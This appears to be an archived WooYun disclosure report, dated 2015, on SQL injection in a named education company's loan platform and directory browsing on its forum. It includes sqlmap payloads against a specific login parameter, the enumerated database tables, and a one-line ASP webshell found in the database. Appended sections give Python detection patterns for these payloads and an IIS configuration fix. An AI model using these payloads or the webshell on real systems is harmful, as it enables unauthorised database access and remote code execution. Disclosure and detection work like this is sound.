WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-08-10: Details reported to the vendor, awaiting vendor response
2015-08-11: Vendor has confirmed; details disclosed to the vendor only
2015-08-20: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public
Injection + directory traversal
1. SQL injection: E学贷 (E-Loan) management platform
http://credit.open.com.cn/Home/LoginSubmit
POST data: jizhu=0&loginname=-1&password=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: loginname
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: jizhu=0&loginname=-1' UNION ALL SELECT CHAR(113)+CHAR(111)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(69)+CHAR(120)+CHAR(89)+CHAR(110)+CHAR(88)+CHAR(104)+CHAR(84)+CHAR(114)+CHAR(71)+CHAR(117)+CHAR(113)+CHAR(120)+CHAR(103)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: jizhu=0&loginname=-1'; WAITFOR DELAY '0:0:5'--&password=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: jizhu=0&loginname=-1' WAITFOR DELAY '0:0:5'--&password=
---
[03:31:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] E_Loan
[*] master
[*] model
[*] msdb
[*] tempdb
Database: E_Loan
[52 tables]
+---------------------------+
| 2015过年活动人员名单      |
| Dic_Activity_Type         |
| Dic_Bank                  |
| Dic_CompanyScale          |
| Dic_CompanyType           |
| Dic_Connect_Type          |
| Dic_Default_Rule          |
| Dic_DutyType              |
| Dic_EducationalStatus     |
| Dic_FileBusiness_Type     |
| Dic_MaritalStatus         |
| Dic_Repay_Type            |
| Dic_WorkYear              |
| TBL_Activity_Group        |
| TBL_Activity_Group        |
| TBL_Actvity_User          |
| TBL_Audit_Reason          |
| TBL_Client_His            |
| TBL_Client_His            |
| TBL_Connect_Man_His       |
| TBL_Connect_Man_His       |
| TBL_Loan_Connect_Man_His  |
| TBL_Loan_Connect_Man_His  |
| TBL_Loan_EarlyRepay_His   |
| TBL_Loan_EarlyRepay_His   |
| TBL_Loan_File_Relevance   |
| TBL_Loan_File_Relevance   |
| TBL_Loan_FromCompany      |
| TBL_Loan_Instalment_His   |
| TBL_Loan_Instalment_His   |
| TBL_Loan_Instalment_Input |
| TBL_Loan_Product          |
| TBL_Loan_Rate             |
| TBL_Loan_Record_His       |
| TBL_Loan_Record_His       |
| TBL_Loan_Record_Sequence  |
| TBL_Loan_ToCompany        |
| TBL_Login_Type            |
| TBL_Menu_Url              |
| TBL_Menu_Url              |
| TBL_Notice_TiggerType     |
| TBL_Notice_TiggerType     |
| TBL_Notice_Type           |
| TBL_Phone_ValidCode       |
| TBL_Repay_Date            |
| TBL_Role_Menu             |
| TBL_Role_Menu             |
| TBL_User_Menu             |
| TBL_User_Menu             |
| TBL_User_Role             |
| cmd                       |
| sqlmapoutput              |
+---------------------------+
A one-line webshell has been written into the database. Oh oh!!!
Database: E_Loan
Table: cmd
[1 entry]
+-------------------------+
| a                       |
+-------------------------+
| <%eval request("yun")%> |
+-------------------------+
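Two things in the report above are worth turning into detection logic for whoever operates a site like this: the shapes of the payloads sqlmap reported against the loginname parameter (UNION SELECT, WAITFOR DELAY, a stacked query after a semicolon, CHAR() concatenation, a trailing comment), and the stray cmd and sqlmapoutput tables whose content is a one-line ASP webshell rather than application data. The following is an added example, not code from the report or from the vendor: it parses constructed login POST bodies the way the server would decode them and flags the indicators per parameter, and it scans constructed dump rows for webshell markers. The sample bodies and rows are constructed here and only imitate the payload shapes quoted in the report; the PHP marker generalizes beyond the ASP one-liner the report shows.

```python
import re
from urllib.parse import parse_qs

# Constructed request bodies as they would appear on the wire (URL-encoded).
# Bodies 1 and 2 imitate the payload shapes sqlmap reported above; 0 and 3 are
# benign logins, including one with a legitimate apostrophe in the name.
SAMPLE_BODIES = [
    "jizhu=0&loginname=alice&password=s3cret",
    "jizhu=0&loginname=-1%27+UNION+ALL+SELECT+CHAR(113)%2BCHAR(111)%2BCHAR(120),NULL,NULL--+&password=",
    "jizhu=0&loginname=-1%27%3B+WAITFOR+DELAY+%270:0:5%27--&password=",
    "jizhu=0&loginname=o%27brien&password=pass",
]

# Indicator patterns, each named after the sqlmap technique it corresponds to.
# A lone quote is deliberately not an indicator: names such as o'brien are legal.
INDICATORS = [
    ("union_select", re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I)),
    ("time_delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("stacked_query", re.compile(r";\s*(?:WAITFOR|EXEC|INSERT|UPDATE|DELETE|DROP|CREATE)\b", re.I)),
    ("char_concat", re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){2,}", re.I)),
    ("comment_terminator", re.compile(r"--\s*$|/\*")),
]


def scan_body(body: str) -> dict:
    """Decode a form body and return {parameter: [indicator names]} for every
    parameter that trips at least one indicator. Benign bodies return {}."""
    # keep_blank_values so an emptied password= still shows up as a parameter
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        found = set()
        for value in values:
            for label, pattern in INDICATORS:
                if pattern.search(value):
                    found.add(label)
        if found:
            hits[name] = sorted(found)
    return hits


# Constructed rows resembling a dump of a database that should only hold
# application data; the first row copies the one-liner shape from the report.
SAMPLE_ROWS = [
    {"table": "cmd", "column": "a", "value": '<%eval request("yun")%>'},
    {"table": "Dic_Bank", "column": "name", "value": "Example Bank"},
    {"table": "TBL_Notice_Type", "column": "template", "value": "Hello <%= name %>"},
]

# Markers for one-line webshells: an ASP/VBScript eval or execute of request
# input, and the equivalent PHP eval/assert of a superglobal.
WEBSHELL_MARKERS = [
    ("asp_eval_request", re.compile(r"<%\s*(?:eval|execute)\b[^%]*\brequest\s*\(", re.I)),
    ("php_eval_request", re.compile(r"<\?php\s+(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I)),
]


def find_webshell_markers(rows) -> list:
    """Return (table, column, marker) for every cell that matches a marker.
    Template snippets like <%= name %> do not match because no eval follows <%."""
    findings = []
    for row in rows:
        for label, pattern in WEBSHELL_MARKERS:
            if pattern.search(row["value"]):
                findings.append((row["table"], row["column"], label))
    return findings


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body, "->", scan_body(body) or "clean")
    print(find_webshell_markers(SAMPLE_ROWS))
```

Matching on decoded parameter values, not on the raw body, matters: the `+` in `CHAR(113)+CHAR(111)` travels as `%2B`, so a filter applied to the raw body would miss the concatenation. Detection of this kind is a backstop only; the fix on the login handler side is a parameterized query so that loginname can never be interpreted as SQL, and a database account that cannot create tables, which would have prevented the cmd table from appearing at all.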
2. Directory traversal: 奥鹏 (Open) Distance Education Public Service System Summit Forum
http://forum.open.com.cn
Look at what has already been done to it!
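The report gives no detail on the forum beyond the URL, and in WooYun reports "directory traversal" usually means that directory browsing was left enabled so the server lists a folder's contents. Assuming the forum ran on IIS like the credit site above (the report identifies IIS 7.5 only for credit.open.com.cn, so this is an assumption), the setting that turns listing off lives in web.config. This is an added example, not a configuration from the report or the vendor.

```xml
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.webServer>
    <!-- Weak setting: IIS renders a listing for any folder without a default document -->
    <!-- <directoryBrowse enabled="true" /> -->

    <!-- Corrected setting: requests for a bare folder get 403 instead of a file list -->
    <directoryBrowse enabled="false" />
  </system.webServer>
</configuration>
```

The same change from the command line on the server is `appcmd set config "Default Web Site" /section:directoryBrowse /enabled:false`, substituting the real site name. Turning listing off hides the index but not the files; anything already uploaded into a listable folder still has to be found and removed, and access logs for that folder checked for what was requested while listing was on.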
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-08-11 15:01
Relevant personnel have been notified to handle it
2015-08-20: The E学贷 vulnerability has been fixed; the forum site has been taken offline